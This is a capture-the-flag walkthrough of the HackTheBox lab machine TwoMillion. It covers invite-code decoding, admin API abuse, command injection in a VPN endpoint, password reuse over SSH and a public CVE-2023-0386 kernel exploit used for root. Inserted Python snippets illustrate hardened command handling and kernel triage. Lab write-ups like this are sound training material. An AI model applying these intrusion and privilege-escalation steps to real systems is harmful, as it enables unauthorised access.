TwoMillion — HTB

Grishma Acharya
6 min read · Nov 13, 2024


TwoMillion is an easy Linux machine released on HackTheBox to celebrate reaching 2 million users. This box features an old version of the HackTheBox platform, which includes a hackable invite code. By exploiting this invite code, we gain initial access, allowing us to create an account on the platform. With our new account, we can explore various API endpoints, one of which provides a way to escalate our privileges to Administrator. As an Administrator, we can exploit a command injection vulnerability in the VPN generation endpoint to gain a system shell.

Once inside, we find a .env file containing database credentials. Thanks to password reuse, we can log in as the admin user on the machine. With further enumeration, we discover that the kernel is outdated and vulnerable to CVE-2023-0386, allowing us to achieve root privileges.

Initial Reconnaissance

Starting with an nmap scan to identify open ports and services on 10.10.11.221:

$ nmap 10.10.11.221

Output:

PORT   STATE SERVICE
22/tcp open ssh
80/tcp open http

Here, we see two open TCP ports: 22 (SSH) and 80 (HTTP). To dig deeper, we run a service and version detection scan against those two ports:

$ nmap -p 22,80 -A 10.10.11.221

Key Findings:

  • Port 22 (SSH): Running OpenSSH 8.9p1 on Ubuntu.
  • Port 80 (HTTP): Hosting a website on nginx, which redirects us to http://2million.htb.

Configuring Access to 2million.htb

To access the website, we add an entry in /etc/hosts:

10.10.11.221 2million.htb

Visiting http://2million.htb, we encounter an interface reminiscent of HackTheBox’s old invite code system, setting the stage for the first part of our exploit:

The Join section links to the /invite page.

Examining the JavaScript sources, I found /js/inviteapi.min.js, a minified, obfuscated file that defines two functions: verifyInviteCode and makeInviteCode.

By calling makeInviteCode() in the browser console and decoding the ROT13-encoded data it returned using CyberChef, I uncovered a message:

“To generate the invite code, make a POST request to /api/v1/invite/generate."

Decoding the base64-encoded value in the response to that POST request, I got:

T8U29-HN72S-7SVLR-201BB

Verifying the Invite Code

I entered the invite code using the verifyInviteCode function, which confirmed it was valid.

After entering the invite code on the /invite page, we get redirected to /register.

After registration and logging in, we can see the homepage.

Visiting http://2million.htb/home/access, I saw “Connection Pack” and “Regenerate” options, which point to /api/v1/user/vpn/generate and /api/v1/user/vpn/regenerate respectively.

Admin API Exploration

In /api/v1, I found:

"admin": {
  "GET": {
    "\/api\/v1\/admin\/auth": "Check if user is admin"
  },
  "POST": {
    "\/api\/v1\/admin\/vpn\/generate": "Generate VPN for specific user"
  },
  "PUT": {
    "\/api\/v1\/admin\/settings\/update": "Update user settings"
  }
}

Visiting /api/v1/admin/auth with GET method:

Visiting /api/v1/admin/vpn/generate with POST method:

Visiting /api/v1/admin/settings/update with PUT method:

I then adjusted my requests step by step, using the error message in each response to work out what the endpoint expected.

Again visiting the /api/v1/admin/auth with GET method:

Sending the POST to /api/v1/admin/vpn/generate again, we no longer get the 401 response; instead we see:

{"status":"danger","message":"Invalid content type."}

After inspecting and adjusting the requests accordingly, I got here:

Command Injection to Gain System Access

After some investigation, I found a command injection in the username parameter of the VPN generation request:

Running ls -la through the injection, we can see the web root:

total 56
drwxr-xr-x 10 root root 4096 Nov 13 16:50 .
drwxr-xr-x 3 root root 4096 Jun 6 2023 ..
-rw-r--r-- 1 root root 87 Jun 2 2023 .env
-rw-r--r-- 1 root root 1237 Jun 2 2023 Database.php
-rw-r--r-- 1 root root 2787 Jun 2 2023 Router.php
drwxr-xr-x 5 root root 4096 Nov 13 16:50 VPN
drwxr-xr-x 2 root root 4096 Jun 6 2023 assets
drwxr-xr-x 2 root root 4096 Jun 6 2023 controllers
drwxr-xr-x 5 root root 4096 Jun 6 2023 css
drwxr-xr-x 2 root root 4096 Jun 6 2023 fonts
drwxr-xr-x 2 root root 4096 Jun 6 2023 images
-rw-r--r-- 1 root root 2692 Jun 2 2023 index.php
drwxr-xr-x 3 root root 4096 Jun 6 2023 js
drwxr-xr-x 2 root root 4096 Jun 6 2023 views
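The root cause here is a user-controlled value reaching a shell command. The Python below is an added illustration, not the TwoMillion application's own code (which is PHP): it shows the vulnerable pattern next to a hardened one, allow-list validation followed by an argv list passed to subprocess with no shell. The script path /opt/vpn/gen.sh and the permitted username character set are assumptions made for the example.

```python
"""Vulnerable vs. hardened handling of a user-supplied value that reaches a
system command (added illustration; not the TwoMillion application's PHP)."""
import re
import subprocess
import sys
from typing import List

# Allow-list for usernames. The exact character set is an assumption for this
# illustration; the point is that shell metacharacters are not in it.
_USERNAME_RE = re.compile(r"[A-Za-z0-9_.-]{1,32}")

# Hypothetical path of a VPN config generator script (not the box's real path).
GEN_SCRIPT = "/opt/vpn/gen.sh"


def build_command_unsafe(username: str) -> str:
    """Vulnerable pattern: interpolate the raw value into one shell string.
    Returned here, never executed: if this string were handed to a shell,
    everything after a ';' or '|' in `username` would run as its own command."""
    return f"/bin/bash {GEN_SCRIPT} {username}"


def is_valid_username(username: str) -> bool:
    """Allow-list check: the whole string must match [A-Za-z0-9_.-]{1,32}."""
    return _USERNAME_RE.fullmatch(username) is not None


def build_argv_safe(username: str) -> List[str]:
    """Hardened pattern: validate, then build an argv list for subprocess with
    shell=False. No shell parses the value, so metacharacters are inert."""
    if not is_valid_username(username):
        raise ValueError(f"rejected username: {username!r}")
    return ["/bin/bash", GEN_SCRIPT, username]


def argv_round_trip(value: str) -> str:
    """Demonstrate why argv is safe: a child Python process receives `value` as
    a single argument and prints it back verbatim, metacharacters included."""
    proc = subprocess.run(
        [sys.executable, "-c", "import sys; print(sys.argv[1], end='')", value],
        shell=False, capture_output=True, text=True, check=True, timeout=10,
    )
    return proc.stdout


if __name__ == "__main__":
    for name in ("alice", "alice; id"):
        print("shell string:", build_command_unsafe(name))
        try:
            print("argv        :", build_argv_safe(name))
        except ValueError as exc:
            print("argv        :", exc)
    print("round trip  :", repr(argv_round_trip("alice; id")))
```

Run it without arguments to see both inputs side by side. The validation happens before any process is spawned, and because the hardened path never hands a string to a shell, even a value that slipped past the regex could not escape its argument position.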

In the .env file I found the database credentials:

DB_HOST=127.0.0.1
DB_DATABASE=htb_prod
DB_USERNAME=admin
DB_PASSWORD=SuperDuperPass123

Reusing the database password for SSH works:

$ sshpass -p SuperDuperPass123 ssh admin@2million.htb

I am now logged in as admin and can read the user flag:

admin@2million:~$ cat user.txt
REDACTED

Root Exploitation — CVE-2023-0386

Looking around the filesystem, I found a mail for the admin user:

$ cat /var/mail/admin
From: ch4p <ch4p@2million.htb>
To: admin <admin@2million.htb>
Cc: g0blin <g0blin@2million.htb>
Subject: Urgent: Patch System OS
Date: Tue, 1 June 2023 10:45:22 -0700
Message-ID: <9876543210@2million.htb>
X-Mailer: ThunderMail Pro 5.2

Hey admin,

I'm know you're working as fast as you can to do the DB migration. While we're partially down, can you also upgrade the OS on our web host? There have been a few serious Linux kernel CVEs already this year. That one in OverlayFS / FUSE looks nasty. We can't get popped by that.

HTB Godfather

Running uname -a shows the kernel version:

$ uname -a
Linux 2million 5.15.70-051570-generic #202209231339 SMP Fri Sep 23 13:45:37 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux
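The mail asks for an OS upgrade, and the kernel string shows why. As an added triage helper that is not part of the write-up, the Python below parses that exact uname -a line and flags a kernel that is below a patched-version floor for its stable branch, or was built before the relevant advisory. The floor dictionary is a caller-supplied placeholder, not a claim about which 5.15.y release fixed CVE-2023-0386; the date on the mail above stands in for the advisory date.

```python
"""Kernel version triage from a `uname -a` line (added illustration)."""
import re
from datetime import date
from typing import Dict, Optional, Tuple

Version = Tuple[int, int, int]

# The uname -a output captured on the box, as quoted in the write-up.
UNAME_A = ("Linux 2million 5.15.70-051570-generic #202209231339 SMP "
           "Fri Sep 23 13:45:37 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux")

_VERSION_RE = re.compile(r"\b(\d+)\.(\d+)\.(\d+)\b")
# "#YYYYMMDDhhmm" build stamp, as seen on Ubuntu mainline-PPA kernels
# (format assumed from the line above).
_BUILD_RE = re.compile(r"#(\d{4})(\d{2})(\d{2})\d{4}\b")


def parse_kernel_version(uname_a: str) -> Version:
    """Return (major, minor, patch) from a `uname -a` or `uname -r` string."""
    m = _VERSION_RE.search(uname_a)
    if m is None:
        raise ValueError("no kernel version in input")
    major, minor, patch = (int(g) for g in m.groups())
    return (major, minor, patch)


def parse_build_date(uname_a: str) -> Optional[date]:
    """Return the build date from a #YYYYMMDDhhmm stamp, or None if absent."""
    m = _BUILD_RE.search(uname_a)
    if m is None:
        return None
    return date(int(m.group(1)), int(m.group(2)), int(m.group(3)))


def triage(uname_a: str,
           patched_floor: Dict[Tuple[int, int], Version],
           advisory_date_iso: str) -> Dict[str, object]:
    """Compare the running kernel against a per-branch patched floor supplied
    by the caller (e.g. taken from the distro's advisory) and against the
    advisory date. A kernel below the floor, or built before the advisory,
    needs review before it is assumed safe."""
    version = parse_kernel_version(uname_a)
    branch = version[:2]
    floor = patched_floor.get(branch)
    build = parse_build_date(uname_a)
    advisory = date.fromisoformat(advisory_date_iso)
    return {
        "version": version,
        "floor_known": floor is not None,
        "below_patched_floor": floor is not None and version < floor,
        "built_before_advisory": build is not None and build < advisory,
    }


if __name__ == "__main__":
    # PLACEHOLDER floor: substitute the first 5.15.y release your distro's
    # advisory lists as fixed. Any value above 5.15.70 makes the point here.
    placeholder_floor = {(5, 15): (5, 15, 999)}
    # The mail quoted above is dated 1 June 2023; used in place of the advisory date.
    print(triage(UNAME_A, placeholder_floor, "2023-06-01"))
```

The two signals are deliberately separate: a branch missing from the floor table yields floor_known False rather than a false "patched", and the build-date check still fires on such kernels, so an unrecognised branch is never silently passed.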

Searching for the vulnerability mentioned in the mail, I found this write-up:
https://securitylabs.datadoghq.com/articles/overlayfs-cve-2023-0386/

Then I found a public exploit for it on GitHub:

I uploaded the zipped repository to the target with scp:

$ sshpass -p SuperDuperPass123 scp CVE-2023-0386-main.zip admin@2million.htb:/tmp/

Then I unzipped the file:

admin@2million:/tmp$ unzip CVE-2023-0386-main.zip
Archive: CVE-2023-0386-main.zip
acc49811a9083381c28db9ec296774e6a82be419
creating: CVE-2023-0386-main/
inflating: CVE-2023-0386-main/Makefile
inflating: CVE-2023-0386-main/README.md
inflating: CVE-2023-0386-main/exp.c
inflating: CVE-2023-0386-main/fuse.c
inflating: CVE-2023-0386-main/getshell.c
creating: CVE-2023-0386-main/ovlcap/
extracting: CVE-2023-0386-main/ovlcap/.gitkeep
creating: CVE-2023-0386-main/test/
inflating: CVE-2023-0386-main/test/fuse_test.c
inflating: CVE-2023-0386-main/test/mnt
inflating: CVE-2023-0386-main/test/mnt.c

I followed the instructions in README.md: https://github.com/puckiestyle/CVE-2023-0386

I then opened two terminals, each with an SSH session to admin@2million.htb.

Terminal 1:

$ make all
$ ./fuse ./ovlcap/lower ./gc

Terminal 2:

$ ./exp

I am root now and can read the root flag:

root@2million:/tmp/CVE-2023-0386-main# cat /root/root.txt 
REDACTED

Written by Grishma Acharya

CTF player | Cyber security enthusiast
